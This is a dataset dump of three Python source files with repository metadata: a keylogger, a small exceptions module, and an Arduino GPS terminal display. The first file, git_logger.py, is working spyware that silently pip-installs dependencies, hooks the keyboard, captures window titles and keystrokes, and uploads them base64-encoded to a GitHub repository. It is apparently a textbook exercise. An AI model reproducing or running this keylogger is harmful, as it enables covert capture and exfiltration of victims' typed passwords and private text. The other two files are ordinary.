fd95b0d9e5f79057828a0ec3f2924b5321ac21c6 | c7c518ce251ad9b822d775e13e0c7edc86006454 | /git_logger.py | e6b3bdaa1a961d9d376c982c2d29629b25b2d8a8 | [
"MIT"
] | permissive | spirosavlonitis/chapter_7 | 791a5193ae086e24800ff733f3c3c27c0de67c2a | 1baeb90932350afa063e2de4bfec03b8899c63ff | refs/heads/master | 2020-04-14T08:50:08.348316 | 2019-01-07T02:16:01 | 2019-01-07T02:16:01 | 163,744,343 | 0 | 0 | null | 2019-01-05T04:47:36 | 2019-01-01T14:53:41 | Python | UTF-8 | Python | false | false | 2,434 | py | import json
import base64
import sys
import imp
import time
import subprocess
from random import randint
from threading import Thread
from queue import Queue
# dynamic import start
try:
from github3 import login
except Exception as e:
try:
subprocess.check_output("python -m pip install github3.py --user", shell=True)
from github3 import login
except Exception as e:
raise e
try:
import pyxhook
except Exception as e:
try:
subprocess.check_output("python -m pip install pyxhook --user", shell=True)
import pyxhook
except Exception as e:
raise e
# dynamic import end
isspace = lambda c: (c == 32 or c == 9)
class Logger():
def __init__(self):
"""Initialize object"""
self.id = "001" # id
self.config_json = None
self.str_buffer = ""
self.current_window = None
def connect_to_github(self):
"""Connect to github"""
self.gh = login(username="yourusername", password="yourpassword")
self.repo = self.gh.repository("yourusername", "yourrepository")
self.branch = self.repo.branch("master")
def store_log(self):
"""Push results to github"""
self.connect_to_github()
data_path = "data/%s/logger_%d.data" % (self.id, round(time.time()))
self.repo.create_file(data_path, "KeyStrokes", base64.b64encode(self.str_buffer.encode()))
self.str_buffer = ""
def KeyStroke(self, event):
"""Log keys"""
if self.current_window != event.WindowName:
self.current_window = event.WindowName
try:
self.str_buffer += "\n"+self.current_window+"\n"
except TypeError as e:
self.str_buffer += "\n"+self.current_window.decode()+"\n"
if "BackSpace" in event.Key and len(self.str_buffer):
self.str_buffer = self.str_buffer[:-1]
elif event.Ascii > 32 and event.Ascii < 128 or isspace(event.Ascii):
self.str_buffer += chr(event.Ascii)
elif "Return" in event.Key:
self.str_buffer += "\n"
if len(self.str_buffer) >= 512:
self.store_log()
return True
def main(argc, argv):
logger = Logger()
kl = pyxhook.HookManager()
kl.KeyDown = logger.KeyStroke
kl.HookKeyboard()
kl.start()
if __name__ == '__main__':
main(len(sys.argv), sys.argv)
| [
"spirosa84@hotmail.com"
] | spirosa84@hotmail.com |
0e8aa7538481abe5a5324a61bfe548e6eb342c62 | 7c89cad967988589a1969922adcb9d1d8ef8bbcb | /bpmappers/exceptions.py | 6fd9dbfc270ade0b6281e6570d53de457bd925f5 | [
"MIT"
] | permissive | akiyoko/bpmappers | e8277bdd4d6091ea5bed7e6385ee29baf92b9108 | 02a99adb1c4be6787bea015eeeb5842df540e627 | refs/heads/master | 2020-03-29T15:22:21.069252 | 2018-09-24T05:50:40 | 2018-09-24T06:16:12 | 150,059,972 | 0 | 0 | MIT | 2018-09-24T05:48:01 | 2018-09-24T05:48:01 | null | UTF-8 | Python | false | false | 204 | py | class DataError(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return repr(self.message)
class InvalidDelegateException(DataError):
pass
| [
"shinya.okano@beproud.jp"
] | shinya.okano@beproud.jp |
f78b8273234e854f8a98033346c056b40540b905 | 8b31087237d86dce4c4105a049b210ffb499a7db | /1014-Consumption.py | c32c0070c3a4eed4a78214c5272a0f51218dfa89 | [
"MIT"
] | permissive | OrianaCadavid/uri-oj | ef538ea080da8b0c713bc20538ce08a9a22916f4 | 256c811007712e85f636ae5b9357a59cf608daa8 | refs/heads/master | 2020-05-21T06:25:29.025347 | 2017-08-02T20:19:08 | 2017-08-02T20:19:08 | 84,588,409 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 204 | py | def main():
distance = int(raw_input())
spent_fuel = float(raw_input())
consumption = distance / spent_fuel
print '{:.3f} km/l'.format(consumption)
if __name__ == '__main__':
main()
| [
"ocadavid@utp.edu.co"
] | ocadavid@utp.edu.co |
61d1d1e66cbe61f5828d915f7ac13f0707e35082 | 76340f68f9734734d24a044299316a826c2b98dc | /v2_Tech_Review/terminal-app-from-arduino.py | 24aae4492775d2772084048465fce82c6b4b836c | [
"MIT"
] | permissive | laurengulland/009yellow-beacon | 44d6f96b0d6b03805a7664d35578acd4c98ec079 | 2f9237163d8a104c9ec6e854a0bc2cbbd0e42de3 | refs/heads/master | 2021-08-28T08:34:15.731568 | 2017-12-11T18:43:08 | 2017-12-11T18:43:08 | 106,962,423 | 0 | 1 | null | 2017-12-06T02:59:11 | 2017-10-14T20:58:56 | HTML | UTF-8 | Python | false | false | 6,368 | py | import curses
import serial
import time
import signal
class TimeoutException(Exception): # Custom exception class
pass
def timeout_handler(signum, frame): # Custom signal handler
raise TimeoutException
signal.signal(signal.SIGALRM, timeout_handler)
class ArduinoDisplay(object):
def __init__(self,baudrate=9600):
self.test_without_screen=False #set to true for debugging curses
self.test_without_arduino=False #set to true for debugging serial
self.sample_data = 'G2L42.360344N71.094887W12:6.0'
self.arduino=None
self.incoming_scout=1
self.was_data_received=False
self.last_time_data_received=[time.localtime(),time.localtime()]
self.scout_data=[['',''],['','']] #2D array - currently set up for two scouts
self.processed_scout_data=[[(0,0,''),(0,0,''),(0,0,'')],[(0,0,''),(0,0,''),(0,0,'')]]
if not self.test_without_screen:
self.scr = curses.initscr()
curses.halfdelay(5) # How many tenths of a second are waited, from 1 to 255
curses.noecho() # Wont print the input
if not self.test_without_arduino:
self.arduino=serial.Serial('/dev/ttyACM0',baudrate)
def place_data(self):
# print 'scout '+str(self.incoming_scout)+' data', self.scout_data[self.incoming_scout-1]
str_time = time.strftime("%H:%M:%S", self.last_time_data_received[self.incoming_scout-1])
row = int(self.incoming_scout*3.5)
print 'scout data:',self.scout_data
if self.was_data_received:
self.processed_scout_data[self.incoming_scout-1][0]= (row, 5, self.scout_data[self.incoming_scout-1][0])
self.processed_scout_data[self.incoming_scout-1][1]= (row, 25, self.scout_data[self.incoming_scout-1][1])
self.processed_scout_data[self.incoming_scout-1][2]= (row, 45, str(str_time))
elif 'null' in self.scout_data[self.incoming_scout-1][0]:
self.processed_scout_data[self.incoming_scout-1][0]= (row, 5, 'NO GPS SIGNAL')
self.processed_scout_data[self.incoming_scout-1][1]= (row, 25, 'NO GPS SIGNAL')
self.processed_scout_data[self.incoming_scout-1][2]= (row, 45, str(str_time))
elif 'NO' in self.scout_data[self.incoming_scout-1]:
self.processed_scout_data[self.incoming_scout-1][0] = (3, 5, 'NO CONNECTION')
self.processed_scout_data[self.incoming_scout-1][1] = (7, 5, 'NO CONNECTION')
else:
pass
print 'processed_scout_data: ',self.processed_scout_data
def draw_screen(self):
self.scr.clear()
self.scr.addstr(1,2,'SCOUT 1 ------------------------------------------------------')
self.scr.addstr(5,2,'SCOUT 2 ------------------------------------------------------')
self.scr.addstr(10,0,'Current Time: '+time.strftime("%H:%M:%S",time.localtime()))
# print(self.processed_scout_data)
for scout_data in self.processed_scout_data:
for dat in scout_data:
self.scr.addstr(dat[0],dat[1],dat[2])
self.scr.refresh()
def process_incoming_data(self,transmitted=None):
if 'null' not in transmitted and len(transmitted)==29:
self.was_data_received=True
# print 'TRANSMITTING:',transmitted
self.incoming_scout = int(transmitted[transmitted.index('G')+1:transmitted.index('G')+2])
location_n = transmitted[transmitted.index('L')+1:transmitted.index('N')]+' '+transmitted[transmitted.index('N')]
location_w = transmitted[transmitted.index('N')+1:transmitted.index('W')]+' '+transmitted[transmitted.index('W')]
self.last_time_data_received[self.incoming_scout-1] = time.localtime()
self.scout_data[self.incoming_scout-1] = [location_n,location_w]
elif 'null' in transmitted:
self.was_data_received=False
#maybe have it display warning that received bad data?
# print 'transmitted: ',transmitted
# self.incoming_scout=int(transmitted[transmitted.index('S')+1:transmitted.index('S')+2])
# print self.incoming_scout
# print ['GPS'+str(self.incoming_scout)+'null', 'GPS'+str(self.incoming_scout)+'null']
try: #this is cheap but I don't care right now
self.incoming_scout=int(transmitted[transmitted.index('S')+1:transmitted.index('S')+2])
self.scout_data[self.incoming_scout-1]=['GPS'+str(self.incoming_scout)+'null', 'GPS'+str(self.incoming_scout)+'null']
except:
print 'EXCEPTED'
self.scout_data[0] = ['FAULTY DATA', 'FAULTY DATA']
self.scout_data[1] = ['FAULTY DATA', 'FAULTY DATA']
print('NO GPS TRANSMITTED')
elif 'NO CONNECTION' in transmitted:
print('PROCESSING WITHOUT CONNECTION')
self.was_data_received=False
self.scout_data[0] = ['NO CONNECTION', 'NO CONNECTION']
self.scout_data[1] = ['NO CONNECTION', 'NO CONNECTION']
else:
self.was_data_received=False
print('NOPE')
def run(self):
if not self.test_without_screen:
self.draw_screen()
while True:
# if not self.test_without_screen:
# char = self.scr.getch() # This blocks (waits) until the time has elapsed, or there is input to be handled
if self.test_without_arduino:
transmitted=self.sample_data
else:
signal.alarm(1)
try:
transmitted = self.arduino.readline()[:-2]
except TimeoutException:
self.incoming_scout= (self.incoming_scout+1)%2+1
transmitted='NO CONNECTION'
else:
signal.alarm(0)
print 'RECEIVED: ',transmitted
self.process_incoming_data(transmitted)
print 'scout '+str(self.incoming_scout)+' data', self.scout_data[self.incoming_scout-1]
self.place_data()
if not self.test_without_screen:
self.draw_screen()
self.scr.addstr(10,0,'Current Time: '+time.strftime("%H:%M:%S",time.localtime()))
if __name__ == '__main__':
display = ArduinoDisplay(9600)
display.run()
| [
"lauren.gulland@students.olin.edu"
] | lauren.gulland@students.olin.edu |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.